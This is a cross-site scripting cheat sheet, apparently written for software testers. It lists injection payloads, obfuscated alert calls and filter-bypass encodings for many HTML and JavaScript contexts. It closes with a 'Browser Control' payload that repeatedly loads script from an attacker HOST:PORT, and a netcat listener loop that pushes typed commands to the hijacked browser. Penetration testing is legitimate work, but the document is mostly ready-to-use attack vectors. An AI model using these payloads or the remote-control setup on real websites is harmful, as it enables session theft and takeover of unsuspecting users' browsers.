XSS Cheat Sheet


According to OWASP, Cross-site Scripting (XSS) is one of the most dangerous types of attack. Web applications that store and redisplay user-supplied data are potentially exposed to it. A cheat sheet of basic and advanced XSS exploits can therefore come in handy for any software tester. Below I have gathered different types of XSS exploits with examples.

XSS Cheat Sheet

Technique / Vector or Payload

HTML Context, Tag Injection:
  <svg onload=alert(1)>
  "><svg onload=alert(1)//

HTML Context, Inline Injection:
  "onmouseover=alert(1)//
  "autofocus/onfocus=alert(1)//

Javascript Context, Code Injection:
  '-alert(1)-'
  '-alert(1)//

Javascript Context, Code Injection (escaping the escape):
  \'-alert(1)//

Javascript Context, Tag Injection:
  </script><svg onload=alert(1)>

PHP_SELF Injection:
  http://DOMAIN/PAGE.php/"><svg onload=alert(1)>

Without Parenthesis:
  <svg onload=alert`1`>
  <svg onload=alert&lpar;1&rpar;>
  <svg onload=alert&#x28;1&#x29>
  <svg onload=alert&#40;1&#41>

Filter Bypass, Alert Obfuscation:
  (alert)(1)
  a=alert,a(1)
  [1].find(alert)
  top["al"+"ert"](1)
  top[/al/.source+/ert/.source](1)
  al\u0065rt(1)
  top['al\145rt'](1)
  top['al\x65rt'](1)
  top[8680439..toString(30)](1)

Body Tag:
  <body onload=alert(1)>
  <body onpageshow=alert(1)>
  <body onfocus=alert(1)>
  <body onhashchange=alert(1)><a href=#x>click this!#x
  <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
  <body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
  <body onresize=alert(1)>press F12!
  <body onhelp=alert(1)>press F1! (MSIE)

Miscellaneous Vectors:
  <marquee onstart=alert(1)>
  <marquee loop=1 width=0 onfinish=alert(1)>
  <audio src onloadstart=alert(1)>
  <video onloadstart=alert(1)><source>
  <input autofocus onblur=alert(1)>
  <keygen autofocus onfocus=alert(1)>
  <form onsubmit=alert(1)><input type=submit>
  <select onchange=alert(1)><option>1<option>2
  <menu id=x contextmenu=x onshow=alert(1)>right click me!

Filter Bypass, Generic Tag + Handler:

  Encoding:
    %3Cx onxxx=1
    <%78 onxxx=1
    <x %6Fnxxx=1
    <x o%6Exxx=1
    <x on%78xx=1
    <x onxxx%3D1

  Mixed Case:
    <X onxxx=1
    <x OnXxx=1
    <X OnXxx=1

  Doubling:
    <x onxxx=1 onxxx=1

  Spacers:
    <x/onxxx=1
    <x%09onxxx=1
    <x%0Aonxxx=1
    <x%0Conxxx=1
    <x%0Donxxx=1
    <x%2Fonxxx=1

  Quotes:
    <x 1='1'onxxx=1
    <x 1="1"onxxx=1

  Stripping:
    <[S]x onx[S]xx=1
    ([S] = stripped char or string)

  Mimetism:
    <x </onxxx=1
    <x 1=">" onxxx=1
    <http://onxxx%3D1/

Generic Source Breaking:
  <x onxxx=alert(1) 1='

Browser Control:
  <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>

  Shell listener on PORT that answers each request with whatever is typed at the "j$" prompt:
  $ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
